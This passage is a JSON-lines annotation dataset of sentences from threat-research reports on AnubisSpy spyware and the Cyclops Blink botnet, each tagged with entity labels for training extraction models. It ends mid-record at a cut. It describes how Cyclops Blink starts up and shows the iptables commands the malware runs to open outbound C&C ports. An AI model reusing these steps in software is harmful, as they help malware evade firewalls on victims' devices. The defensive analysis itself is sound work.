{"id":5263,"text":"Persistent and furtive spyware is an underrated problem for the mobile platform.","entities":[],"relations":[],"Comments":[]} {"id":5264,"text":"While cyberespionage campaigns on mobile devices may be few and far between compared to ones for desktops or PCs, AnubisSpy proves that they do indeed occur, and may have been more active than initially thought.","entities":[{"id":51303,"label":"malware","start_offset":114,"end_offset":123}],"relations":[],"Comments":[]} {"id":5265,"text":"Will mobile become cyberespionage’s main frontier?","entities":[],"relations":[],"Comments":[]} {"id":5266,"text":"It won’t be a surprise given mobile platform’s increasing ubiquity, especially in workplaces.","entities":[],"relations":[],"Comments":[]} {"id":5267,"text":"Beyond its effects, AnubisSpy also highlights the significance of proactively securing mobile devices, particularly if they’re on BYOD programs and used to access sensitive data.","entities":[{"id":51304,"label":"malware","start_offset":20,"end_offset":29}],"relations":[],"Comments":[]} {"id":5268,"text":"Enforcing the principle of least privilege and implementing an app reputation system are just some of the best practices that can help mitigate threats.","entities":[],"relations":[],"Comments":[]} {"id":5269,"text":"We disclosed our findings to Google on October 12 and worked with Google on further analyzing the AnubisSpy-related apps.","entities":[{"id":51306,"label":"TIME","start_offset":39,"end_offset":49},{"id":51308,"label":"malware","start_offset":98,"end_offset":107},{"id":51305,"label":"identity","start_offset":29,"end_offset":35},{"id":51307,"label":"identity","start_offset":66,"end_offset":72}],"relations":[],"Comments":[]} {"id":5270,"text":"Updates were also made to Google Play Protect to take appropriate action against those apps that have been verified as in violation of Google Play policy.","entities":[{"id":51309,"label":"SOFTWARE","start_offset":26,"end_offset":45},{"id":51310,"label":"SOFTWARE","start_offset":135,"end_offset":146}],"relations":[],"Comments":[]} {"id":5271,"text":"An in-depth technical analysis of AnubisSpy, along with indicators of compromise, is in this technical brief.","entities":[{"id":51311,"label":"malware","start_offset":34,"end_offset":43}],"relations":[],"Comments":[]} {"id":5272,"text":" Trend Micro Solutions End users and enterprises can also benefit from multilayered mobile security solutions such as Trend Micro™ Mobile Security which is also available on Google Play.","entities":[{"id":51313,"label":"SOFTWARE","start_offset":118,"end_offset":146},{"id":51312,"label":"SOFTWARE","start_offset":1,"end_offset":22},{"id":51314,"label":"SOFTWARE","start_offset":174,"end_offset":185}],"relations":[],"Comments":[]} {"id":5273,"text":"For organizations, Trend Micro™ Mobile Security for Enterprise provides device, compliance and application management, data protection, and configuration provisioning, as well as protects devices from attacks that leverage vulnerabilities, preventing unauthorized access to apps, as well as detecting and blocking malware and fraudulent websites.","entities":[{"id":51315,"label":"SOFTWARE","start_offset":19,"end_offset":62}],"relations":[],"Comments":[]} {"id":5274,"text":"Trend Micro’s Mobile App Reputation Service (MARS) covers Android and iOS threats using leading sandbox and machine learning technologies.","entities":[{"id":51317,"label":"SOFTWARE","start_offset":58,"end_offset":65},{"id":51318,"label":"SOFTWARE","start_offset":70,"end_offset":73},{"id":51316,"label":"SOFTWARE","start_offset":0,"end_offset":50}],"relations":[],"Comments":[]} {"id":5275,"text":"It can protect users against malware, zero-day and known exploits, privacy leaks, and application vulnerability.","entities":[],"relations":[],"Comments":[]} {"id":5276,"text":" Tags Malware | APT & Targeted Attacks | Endpoints | Research |","entities":[],"relations":[],"Comments":[]} {"id":5277,"text":"Mobile","entities":[],"relations":[],"Comments":[]} {"id":5278,"text":"With additional insights from Philippe Z Lin Note: This article has been updated on March 17, 2022, 2:00 a.m. ET to include Asus’ security bulletin.","entities":[{"id":51321,"label":"identity","start_offset":124,"end_offset":128},{"id":51320,"label":"TIME","start_offset":84,"end_offset":112},{"id":51319,"label":"identity","start_offset":30,"end_offset":44}],"relations":[],"Comments":[]} {"id":5279,"text":"Cyclops Blink, an advanced modular botnet that is reportedly linked to the Sandworm or Voodoo Bear advanced persistent threat (APT) group, has recently been used to target WatchGuard Firebox devices according to an analysis performed by the UK’s National Cyber Security Centre (NCSC).","entities":[{"id":51322,"label":"malware","start_offset":0,"end_offset":13},{"id":51324,"label":"threat-actor","start_offset":87,"end_offset":98},{"id":51323,"label":"threat-actor","start_offset":75,"end_offset":83},{"id":51325,"label":"identity","start_offset":241,"end_offset":283}],"relations":[{"id":1078,"from_id":51324,"to_id":51323,"type":"duplicate-of"},{"id":1079,"from_id":51322,"to_id":51323,"type":"related-to"}],"Comments":[]} {"id":5280,"text":"We acquired a variant of the Cyclops Blink malware family that targets Asus routers.","entities":[{"id":51326,"label":"malware","start_offset":29,"end_offset":42},{"id":51327,"label":"identity","start_offset":71,"end_offset":75}],"relations":[],"Comments":[]} {"id":5281,"text":"This report discusses the technical capabilities of this Cyclops Blink malware variant and includes a list of more than 150 current and historical command-and-control (C&C) servers of the Cyclops Blink botnet.","entities":[{"id":51328,"label":"malware","start_offset":57,"end_offset":70},{"id":51329,"label":"malware","start_offset":188,"end_offset":201}],"relations":[],"Comments":[]} {"id":5282,"text":"This list aims to aid cybersecurity defenders in searching for affected devices in their networks and starting the remediation process.","entities":[],"relations":[],"Comments":[]} {"id":5283,"text":" We have reached out to Asus regarding our investigation, and they have created a security bulletin that includes a security checklist to help prevent Cyclops Blink attacks, as well as a list of affected Asus products.","entities":[{"id":51330,"label":"malware","start_offset":151,"end_offset":164},{"id":51331,"label":"identity","start_offset":204,"end_offset":208}],"relations":[],"Comments":[]} {"id":5284,"text":"Our data also shows that although Cyclops Blink is a state-sponsored botnet, its C&C servers and bots affect WatchGuard Firebox and Asus devices that do not belong to critical organizations, or those that have an evident value on economic, political, or military espionage.","entities":[{"id":51332,"label":"malware","start_offset":34,"end_offset":47},{"id":51334,"label":"SOFTWARE","start_offset":109,"end_offset":127},{"id":51335,"label":"SOFTWARE","start_offset":132,"end_offset":144}],"relations":[{"id":1080,"from_id":51332,"to_id":51334,"type":"targets"},{"id":1081,"from_id":51332,"to_id":51335,"type":"targets"}],"Comments":[]} {"id":5285,"text":"Hence, we believe that it is possible that the Cyclops Blink botnet’s main purpose is to build an infrastructure for further attacks on high-value targets.","entities":[{"id":51333,"label":"malware","start_offset":47,"end_offset":60}],"relations":[],"Comments":[]} {"id":5286,"text":"Cyclops Blink has been around since at least June 2019, and a considerable number of its C&C servers and bots are active for up to about three years.","entities":[{"id":51336,"label":"malware","start_offset":0,"end_offset":13},{"id":51337,"label":"TIME","start_offset":45,"end_offset":54}],"relations":[],"Comments":[]} {"id":5287,"text":" The Sandworm APT group has been attributed as creating both Cyclops Blink and the VPNFilter internet of things (IoT) botnet.","entities":[{"id":51338,"label":"threat-actor","start_offset":6,"end_offset":14},{"id":51339,"label":"malware","start_offset":62,"end_offset":75},{"id":51340,"label":"malware","start_offset":84,"end_offset":93}],"relations":[{"id":1083,"from_id":51340,"to_id":51338,"type":"attributed-to"},{"id":1082,"from_id":51339,"to_id":51338,"type":"attributed-to"}],"Comments":[]} {"id":5288,"text":"VPNFilter, first discovered in 2018, targeted router and storage devices.","entities":[{"id":51341,"label":"TIME","start_offset":31,"end_offset":35},{"id":16290,"label":"malware","start_offset":0,"end_offset":9}],"relations":[],"Comments":[]} {"id":5289,"text":"It was also reported to have infected hundreds of thousands of devices.","entities":[],"relations":[],"Comments":[]} {"id":5290,"text":"In 2021, Trend Micro published a technical analysis of VPNFilter, which includes a discussion of how the botnet continues to affect infected systems two years after its discovery.","entities":[{"id":51344,"label":"malware","start_offset":55,"end_offset":64},{"id":51342,"label":"TIME","start_offset":3,"end_offset":7},{"id":51343,"label":"identity","start_offset":9,"end_offset":20}],"relations":[],"Comments":[]} {"id":5291,"text":"Sandworm was also responsible for many high-profile attacks, including the 2015 and 2016 attacks on the Ukrainian electrical grid, the 2017 NotPetya attack, the 2017 French presidential campaign, the 2018 Olympic Destroyer attack on the Winter Olympic Games, and a 2018 operation against the Organization for the Prohibition of Chemical Weapons (OPCW). Cyclops Blink malware analysis Cyclops Blink is a modular malware written in the C language.","entities":[{"id":51352,"label":"TIME","start_offset":265,"end_offset":269},{"id":51345,"label":"threat-actor","start_offset":0,"end_offset":8},{"id":51350,"label":"TIME","start_offset":161,"end_offset":165},{"id":51354,"label":"malware","start_offset":354,"end_offset":367},{"id":51355,"label":"malware","start_offset":386,"end_offset":399},{"id":51346,"label":"TIME","start_offset":75,"end_offset":79},{"id":51347,"label":"TIME","start_offset":84,"end_offset":88},{"id":51349,"label":"campaign","start_offset":140,"end_offset":155},{"id":51351,"label":"TIME","start_offset":200,"end_offset":204},{"id":51348,"label":"TIME","start_offset":135,"end_offset":139}],"relations":[],"Comments":[]} {"id":5292,"text":"In its core component, the first thing that the malware does is to check if its executable file name starts with \"[k\".","entities":[],"relations":[],"Comments":[]} {"id":5293,"text":"If it does not, it performs the following routine: It redirects both stdout and stderr file descriptors to \/dev\/null.","entities":[{"id":51356,"label":"FILEPATH","start_offset":109,"end_offset":118}],"relations":[],"Comments":[]} {"id":5294,"text":" It sets the default handlers for SIGTERM, SIGINT, SIGBUS, SIGPIPE, and SIGIO signals.","entities":[],"relations":[],"Comments":[]} {"id":5295,"text":" It reloads itself with a new \"[ktest]\" process name.","entities":[],"relations":[],"Comments":[]} {"id":5296,"text":" It then waits for 37 seconds before it sets up its hard-coded parameters.","entities":[],"relations":[],"Comments":[]} {"id":5297,"text":"These include the hard-coded C&C servers and the interval that should be used to communicate with the C&C servers.","entities":[],"relations":[],"Comments":[]} {"id":5298,"text":" It also creates a pipe for inter-process communication (IPC) by calling the pipe() function for getting two file descriptors for reading and writing data.","entities":[],"relations":[],"Comments":[]} {"id":5299,"text":"It also enables non-blocking I\/O for the writing file descriptor by using ioctl().","entities":[],"relations":[],"Comments":[]} {"id":5300,"text":" After this, a new data packet will be created in memory, which will then be sent to a C&C server.","entities":[],"relations":[],"Comments":[]} {"id":5301,"text":"The details of this communication are covered later in this analysis.","entities":[],"relations":[],"Comments":[]} {"id":5302,"text":"For every hard-coded TCP port used to communicate with the C&C servers, the malware creates a rule in Netfilter — the Linux kernel firewall — using the iptc_insert_entry() function from libiptc1 to allow output communication to it.","entities":[{"id":51359,"label":"SOFTWARE","start_offset":118,"end_offset":139},{"id":51357,"label":"tools","start_offset":102,"end_offset":111}],"relations":[],"Comments":[]} {"id":5303,"text":"The rules have the following parameters: Protocol: TCP Chain: filter Table: OUTPUT Action: ACCEPT","entities":[],"relations":[],"Comments":[]} {"id":5304,"text":"Destination ports: 636, 994, and 995","entities":[],"relations":[],"Comments":[]} {"id":5305,"text":"For an unknown reason, the malware deletes the aforementioned rules and creates them again, this time using the iptables command via the system() function.","entities":[],"relations":[],"Comments":[]} {"id":5306,"text":"The commands are as follows: iptables -D OUTPUT -p tcp --dport %d -j ACCEPT iptables -I OUTPUT -p tcp --dport %d -j ACCEPT ","entities":[],"relations":[],"Comments":[]} {"id":5307,"text":"The OpenSSL library is then initialized, and the core component proceeds to initialize the hard-coded modules.","entities":[{"id":51360,"label":"SOFTWARE","start_offset":4,"end_offset":11}],"relations":[],"Comments":[]} {"id":5308,"text":" Modules initialization ","entities":[],"relations":[],"Comments":[]} {"id":5309,"text":"During this part, the core component initializes the modules.","entities":[],"relations":[],"Comments":[]} {"id":5310,"text":"Communication with the modules is performed via pipes.","entities":[],"relations":[],"Comments":[]} {"id":5311,"text":"For each hard-coded module, the malware creates two pipes before executing them in their own child processes.","entities":[],"relations":[],"Comments":[]} {"id":5312,"text":" Figure 1.","entities":[],"relations":[],"Comments":[]} {"id":5313,"text":"The function that initializes the modules In Figure 1, we inferred the following mod_t structure: Figure 2.","entities":[],"relations":[],"Comments":[]} {"id":5314,"text":"Inferred mod_t structure; the last member is unknown.","entities":[],"relations":[],"Comments":[]} {"id":5315,"text":" Parameters","entities":[],"relations":[],"Comments":[]} {"id":5316,"text":"The parameters are then initialized.","entities":[],"relations":[],"Comments":[]} {"id":5317,"text":"They consist of a 592-byte structure containing essential information sent to the modules via pipes.","entities":[],"relations":[],"Comments":[]} {"id":5318,"text":"This information includes: A “